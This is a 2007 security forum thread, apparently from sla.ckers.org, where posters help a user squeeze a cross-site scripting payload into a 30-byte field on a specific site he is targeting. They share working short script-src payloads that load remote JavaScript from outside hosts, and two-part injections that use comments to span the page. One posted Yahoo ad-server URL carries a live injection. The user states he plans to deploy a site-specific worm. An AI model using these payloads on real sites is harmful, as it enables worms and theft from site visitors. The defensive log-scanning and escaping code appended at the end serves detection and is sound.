Super-Short XSS
Posted by: rebel
Date: February 15, 2007 07:14PM

Hi Slackers,

I am a bit stuck with a particular site. After finally having found a parameter that listens to GET and is not filtered (filtered fields remove <), I am left with no more than 30 exploitable bytes ..

'<script src=""/>' is 16, 'http://' is another 7, tld will eat up at least another 2 bytes plus 1 byte being the trailing dot.. so, 4 bytes left for the domain, assuming a "GET /" would serve the XSS. Otherwise, 2 bytes left for the domain if I would use a 1-digit file ("GET /s"). This would be enough if I had access to di.fm or similar.. Unfortunately I haven't.

I need to shorten this, and don't really know how .. Some ideas so far:
I maybe could use "ftp" instead of "http"..
Maybe there is something similar to tinyurl.com with a very short domain name..
Or I am missing something else and some of the chars I calculated in are not needed..

Please help me on this one.

Re: Super-Short XSS
Posted by: tx
Date: February 15, 2007 07:23PM

What about the Protocol resolution in script tags vector from the cheatsheet: <SCRIPT SRC=//ha.ckers.org/.j> that's 30 exactly
IE only though.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/15/2007 07:25PM by tx.

Re: Super-Short XSS
Posted by: rebel
Date: February 15, 2007 07:31PM

Thanks for the quick reply. It would work, I have access to some 6-8 digit .com domains. :) Pointing out that the script tag doesn't need to be closed again is a start!
Still, solving about any problem "IE-only" gives me headaches and sleepless nights. I will do it this way if no one comes up with anything cross-browser compatible until after the weekend, though.

Re: Super-Short XSS
Posted by: hasse
Date: February 15, 2007 08:23PM

Take a look here, one of these sites might be useful:
http://dmoz.org/Computers/Internet/Web_Design_and_Development/Hosted_Components_and_Services/Redirects



Edited 1 time(s). Last edit at 02/15/2007 08:24PM by hasse.

Re: Super-Short XSS
Posted by: rebel
Date: February 16, 2007 05:30AM

Thx hasse,
I'm trying the short ones from this list. No luck so far though, seems as if most of them do redirection inside a frameset so the url that is being forwarded to doesn't show up in the browser location bar.

Re: Super-Short XSS
Posted by: trev
Date: February 16, 2007 07:30AM

http://www.aboutus.org/Category:Redirect has more redirection services but it seems that surl.ws produces the shortest URLs.

Re: Super-Short XSS
Posted by: kirke
Date: February 16, 2007 03:40PM

the shortest you can get at www.at.hm , IMHO ...

Re: Super-Short XSS
Posted by: Spikeman
Date: February 18, 2007 07:31AM

A while ago I was having the same issue and I recommended RSnake make http://ckers.org/s point to the Stallowned thing, and he did. So <script src=//ckers.org/s> maybe? Also, if you are able to inject in more than one place on the page you could inject <script src=//ckers.org/s> in the first and the closing script tag in the second. I did this in a highscores table for some online game.

Re: Super-Short XSS
Posted by: Anonymous User
Date: February 18, 2007 09:03AM

This XSS works in Firefox and has only 27 bytes - could be even shorter with another URL. I couldn't get it working in IE 6/7 - they seem to insist on something to close the tag/attribute.

http://p.biz.ly/shortxss.html

Source:
<script src=//p.biz.ly/x.js



Edited 2 time(s). Last edit at 02/18/2007 09:38AM by .mario.

Re: Super-Short XSS
Posted by: rebel
Date: February 18, 2007 10:00AM

@Spikeman: good point on doing a second XSS for closing the tag. It would work, provided that it's okay for random html to appear <script ..>here</script>. Nice move from RSnake to host that image for you, although I assume that he is not very much interested in hosting a worm written for a specific site for me. ;)

.mario: nice one. so maybe I can do one XSS for IE, another for FF and a third (not sure I have 3 XSSable fields, will check tomorrow) to close it.

Re: Super-Short XSS
Posted by: Anonymous User
Date: February 18, 2007 10:06AM

@rebel: yep - sounds good. if you can use fragmented xss which appends directly you can get it running in ie i guess.

XSS1 <script src=//p.biz.ly/x.js
XSS2 ></script>

Re: Super-Short XSS
Posted by: rebel
Date: February 18, 2007 10:49AM

@.mario: nope, it doesn't append directly, there's a bunch of HTML between it as I said.

Re: Super-Short XSS
Posted by: Anonymous User
Date: February 18, 2007 11:28AM

Maybe you could inject HTML comments to deactivate the HTML between the field output like this (IE7/IE6 + FFox):

XSS1 <script src=//p.biz.ly/x.js><!--
XSS2 --></script>

Guess the URL should be a little bit shorter to still be under 30 chars :) Also, that one works in IE7/IE6 + FFox:

<script src=include.js>
<b>test</b>
</script>



Edited 1 time(s). Last edit at 02/18/2007 11:33AM by .mario.

Re: Super-Short XSS
Posted by: hasse
Date: February 18, 2007 01:04PM

.mario Wrote:
-------------------------------------------------------
> Maybe you could inject HTML comments to deactivate
> the HTML between the field output like this
> (IE7/IE6 + FFox):
>
> XSS1 <script src=//p.biz.ly/x.js><!--
> XSS2 --></script>
>
> Guess the URL should be a little bit shorter to
> still be under 30 chars :) Also, that one works
> in IE7/IE6 + FFox:
>
> <script src=include.js>
> <b>test</b>
> </script>
>

If it's between script tags shouldn't you use javascript comments?
XSS1 <script src=//p.biz.ly/x.js>/*
XSS2 */</script>



Edited 1 time(s). Last edit at 02/18/2007 01:10PM by hasse.

Re: Super-Short XSS
Posted by: rebel
Date: February 18, 2007 01:11PM

Beautiful :) Thanks a lot - tomorrow I'll hopefully get me a short URL that does real redirection (no frames.. real HTTP header 302 redirection..) and implement it like this - in two pieces, commenting out the HTML in between. Great that src=//.. also works in FF! I'll let you know how it worked out.

Re: Super-Short XSS
Posted by: Anonymous User
Date: February 18, 2007 05:29PM

@hasse: sounds logical and should work too - but even

<script src=include.js><></script>

works on latest FFox,IE & Opera... that's two characters shorter.

@rebel: good luck! btw: biz.ly is quite cool. it's free and features webspace. i think n.biz.ly was still free when i checked this afternoon :)

Re: Super-Short XSS
Posted by: Anonymous User
Date: February 20, 2007 01:51PM

Here's another super short XSS - registered the domain some days ago:

<script src=//h4k.in
FFox only (20 characters)

<script src=//h4k.in></script>
all other Browsers (30 characters)

URL: http://h4k.in

Hope I didn't miscount...

Greetings,
.mario

Re: Super-Short XSS
Posted by: kogir
Date: February 20, 2007 10:40PM

<script src=http://h4k.in/>
(27 chars)

works both in Firefox 2 and IE 7. It seems the last '/' closes the tag as it won't work in either browser without it. I don't know if it works for Opera.

-kogir

Re: Super-Short XSS
Posted by: Kyran
Date: February 20, 2007 11:42PM

It does work in Opera. :)

- Kyran

Re: Super-Short XSS
Posted by: Anonymous User
Date: February 21, 2007 07:03AM

nice one, kogir!

Re: Super-Short XSS
Posted by: trev
Date: March 18, 2007 12:23PM

Can you get it any shorter? :)
http://us.adserver.yahoo.com/a?f=123&p=ysm&l=--%3E%3Cscript%20src=// - adding any more characters causes it to error out.

Re: Super-Short XSS
Posted by: Anonymous User
Date: March 19, 2007 03:39AM

Hmmm, i don't think so - 20 characters are minimum. Or you maybe happen to have a domain like x.org? ;)

Re: Super-Short XSS
Posted by: trev
Date: March 19, 2007 07:51AM

x.nu would be better ;)

Re: Super-Short XSS
Posted by: Anonymous User
Date: March 19, 2007 09:11AM

Maybe this would help:

https://secure.registerapi.com/dds2/index.php

Re: Super-Short XSS
Posted by: rsnake
Date: March 19, 2007 11:39AM

Hmm... maybe it would be a good idea for someone to bite the bullet and pay for a super short domain that looks for referrers to send users off to. That way you really could use x.nu for all this stuff:

<script src=//x.nu (17chars and works in Firefox)

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 03/19/2007 11:39AM by rsnake.

Re: Super-Short XSS
Posted by: trev
Date: March 19, 2007 12:36PM

RSnake, I really don't want to contradict you but it is 18 chars :)
Now I only need to cut down another 4 chars...

Re: Super-Short XSS
Posted by: rsnake
Date: March 19, 2007 06:55PM

Gah! I counted it three times, and I got 17 twice. You're right, and my counting skills are obviously lax.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Super-Short XSS
Posted by: rsnake
Date: March 19, 2007 06:57PM

Well if you owned a one letter TLD.com you could do something like:

<script src=//x (takes you to PayPal in Firefox).

- RSnake
Gotta love it. http://ha.ckers.org

Re: Super-Short XSS
Posted by: trev
Date: March 19, 2007 07:09PM

Lol. No, that one only works in the address line - it tries x.com and www.x.com if it cannot resolve x. But for a script or an iframe you will need to specify the full www.x.com address.

Re: Super-Short XSS
Posted by: rsnake
Date: March 19, 2007 08:30PM

Ugh, you're right, I should have tested that, it didn't work:

http://x:80

GET / HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://ha.ckers.org/
Cache-Control: max-age=0

- RSnake
Gotta love it. http://ha.ckers.org
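The defensive takeaway from this thread is that a 30-byte field limit is no protection: protocol-relative and unclosed script tags fit easily, and they may arrive URL-encoded (as in trev's ad-server URL). The following is an added example, not code from the thread or from any poster: a small Python log scanner that decodes query values (including double encoding) and flags these short script-src shapes, alongside the output encoding that neutralizes them regardless of length. The helper names and the log lines are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# Matches "<script" followed by a src= attribute, whether the value is
# protocol-relative (//host), absolute (http://host) or the tag is unclosed.
SCRIPT_SRC_RE = re.compile(r"<\s*script\b[^>]*\bsrc\s*=", re.IGNORECASE)


def normalize(value: str) -> str:
    """URL-decode up to three times so double-encoded payloads are also exposed."""
    prev, cur = None, value
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def is_script_injection(param_value: str) -> bool:
    """True when the decoded parameter value carries a <script src= shape."""
    return SCRIPT_SRC_RE.search(normalize(param_value)) is not None


def scan_log(lines):
    """Return (line_number, decoded_value) for every suspicious query value."""
    hits = []
    for no, line in enumerate(lines, 1):
        _, _, query = line.partition("?")          # constructed format: METHOD path?query
        for pair in query.split("&"):
            _, _, value = pair.partition("=")      # split on the first '=' only
            if is_script_injection(value):
                hits.append((no, normalize(value)))
    return hits


def render_safely(value: str) -> str:
    """HTML-escape for a text context; this, not a length cap, is the fix."""
    return html.escape(value, quote=True)


# Constructed sample access-log lines (payload shapes taken from the thread).
SAMPLE_LOG = [
    "GET /search?q=hello+world",
    "GET /a?f=123&p=ysm&l=--%3E%3Cscript%20src=//x.nu",
    "GET /profile?name=%3Cscript%20src%3D%2F%2Fh4k.in",
    "GET /page?ref=%253Cscript%2520src%3Dhttp%3A%2F%2Fh4k.in%2F%3E",
    "GET /page?t=%3Cb%3Ebold%3C/b%3E",
]
```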
